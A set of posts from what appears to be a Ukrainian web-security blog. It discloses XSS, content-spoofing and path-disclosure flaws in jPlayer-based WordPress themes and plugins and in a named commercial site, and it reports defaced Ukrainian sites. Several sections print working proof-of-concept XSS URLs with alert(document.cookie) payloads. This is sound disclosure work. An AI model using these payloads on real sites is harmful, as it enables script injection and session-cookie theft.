Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Traffic Analyzer, Spiffy XSPF Player та Spider Video Player. Для котрих з’явилися експлоіти. Traffic Analyzer - це плагін для аналіза трафіка, Spiffy XSPF Player - це медіа плеєр, Spider Video Player - це відео плеєр.

• WordPress Traffic Analyzer Cross Site Scripting (деталі)
• WordPress Spiffy XSPF Player 0.1 SQL Injection (деталі)
• WordPress Spider Video Player 2.1 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Виявлені уразливості безпеки в Adobe ColdFusion.

Уразливі версії: Adobe ColdFusion 9.0, ColdFusion 10.

Витік інформації, несанкціонований доступ.

• Уязвимости безопасности в Adobe ColdFusion (деталі)

У січні, 31.01.2013, я виявив Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темах для WordPress, що містять jPlayer.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. Зокрема в багатьох плагінах і темах для WordPress. Плюс є багато сайтів, на яких Jplayer.swf розміщена в інших папках окрім плагінів і тем. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по темам для WordPress можна знайти 313000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Studiozen, Photocrati, Music, Imperial Fairytale та Feather12. Та тисячі інших уразливих тем для WordPress (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

Studiozen:

http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Photocrati:

http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Music:

http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Imperial Fairytale:

http://site/wp-content/themes/imperial-fairytale/assets/swf/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alertu0028document.cookieu0029%3E

Feather12:

http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/studiozen/

http://site/wp-content/themes/photocrati-theme/

http://site/wp-content/themes/music/

http://site/wp-content/themes/imperial-fairytale/

http://site/wp-content/themes/feather12/

Вразливі наступні веб додатки: всі версії тем Studiozen, Photocrati, Music, Imperial Fairytale та Feather12.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

З 06.04.2012 по 04.02.2013 відбувся шостий масовий взлом сайтів на сервері Delta-X, після п’ятого взлому сайтів на сервері Delta-X. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний шостий сервер компанії Delta-X. Взлом складався з багатьох окремих дефейсів. Попередні п’ять масових дефейсів на серверах даної компанії відбувалися в 2010 році.

Всього було взломано 19 сайтів на сервері української компанії Delta-X (IP 91.206.201.15). Це наступні сайти: kroshkadekor.com, www.drivers-nout.com, promland.biz, www.clothescloser.com.ua, obuhivzem.gov.ua, 700-800.com, www.komfort.zt.ua, dom2007.com.ua, vadmart.net, viver.net.ua, www.kotovsk-teplokomunenergo.com.ua, www.sitlie.com, pulsarmodel.net, www.uslugikiev.com, ustars.org.ua, artcollege.dn.ua, auto-forum.ikoleso.com.ua, test.music4us.com.ua, divar.com.ua. Серед них український державний сайт obuhivzem.gov.ua.

Дефейси по одному сайту булу проведені хакерами ZoRRoKiN, Newbie3viLc063s, ArTiN, AkSuVaRi, ha4k3r, Aerul Da White-Hkc, Hmei7, david becker, Momik, DaiLexX і netcat та по два сайти хакерами Sejeal, misafir, 1923Turk і TURK KURSUNU.

Враховуючи велику кількість окремих дефейсів по одному або два сайти, всі вони явно були зроблені при взломах окремих сайтів.

Виявлені численні уразливості безпеки в Adobe Shockwave Player.

Уразливі версії: Adobe Shockwave Player 12.0.

Переповнення буфера, пошкодження пам’яті, витік інформації.

• Security update available for Adobe Shockwave Player (деталі)

Продовжуючи розпочату традицію, після попереднього відео про захоплення мережі через руткіти для роутерів, пропоную нове відео на веб секюріті тематику. Цього разу відео про атаки через JavaScript ботнети. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 20: Owning Bad Guys {And Mafia} With Javascript Botnets

Торік на конференції DEFCON 20 відбувся виступ Chema Alonso. В своєму виступі він розповів про MITM атаки та про проведення атак на поганих хлопців через JavaScript ботнети. Коли з використанням JavaScript коду і XSS уразливостей створюються JS ботнети, які використовуються для атак.

Чема розповів про різні аспекти MITM атак та про використання для них JavaScript ботнетів. Рекомендую подивитися дане відео для розуміння сучасних загроз в Інтернеті.

27.12.2012

У листопаді, 22.11.2012, я знайшов Content Spoofing та Cross-Site Scripting уразливості на комерційному проекті http://www.comdi.com. Про що вже сповістив адміністрацію сайта.

Стосовно дірок на e-commerce сайтах та сайтах електронних платіжних систем в останнє я писав про уразливості на www.payu.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.04.2013

Content Spoofing:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie)
http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Та інші Content Spoofing та Cross-Site Scripting уразливості в JW Player.

Дані уразливості досі не виправлені.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://koryukivka-rada.gov.ua (хакером Hmei7) - 09.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://rekord.gov.ua (хакером Hmei7) - 10.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://belwitec.com.ua (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://cargo-euro.com (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://dju.org.ua (хакером rEd X) - 17.04.2013, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• (0Day) HP SiteScope SOAP Call getFileInternal Remote Code Execution Vulnerability (деталі)
• EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities (деталі)
• (0Day) HP SiteScope SOAP Call loadFileContent Remote Code Execution Vulnerability (деталі)
• tinyproxy security update (деталі)
• (0Day) HP SiteScope SOAP Call update Remote Code Execution Vulnerability (деталі)
• FreeRADIUS: Stack Overflow in TLS-based EAP Methods (деталі)
• freeradius security update (деталі)
• Memory corruption vulnerabilities in Konqueror (деталі)
• HP Performance Insight with Sybase, Remote Denial of Service (DoS) and Loss of Data (деталі)
• Mesa vulnerability, as used in Google Chrome (деталі)

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагінах для WordPress, що містять jPlayer. Про що вже сповістив розробників п’яти наведених плагінів.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по плагінам для WordPress можна знайти 239000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох плагінах для WordPress. Серед них MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer і WP jPlayer. Та існують інші уразливі плагіни для WordPress з Jplayer.swf (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

MP3-jPlayer:

http:/site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Haiku minimalist audio player:

http:/site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Background Music:

http:/site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Jammer:

http:/site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

WP jPlayer:

http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Вразливі наступні веб додатки: MP3-jPlayer 1.8.3 і попередні версії, Haiku minimalist audio player 1.0.0 і попередні версії, Background Music 1.0 і попередні версії, Jammer 0.2 і попередні версії, WP jPlayer 0.1 і попередні версії.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.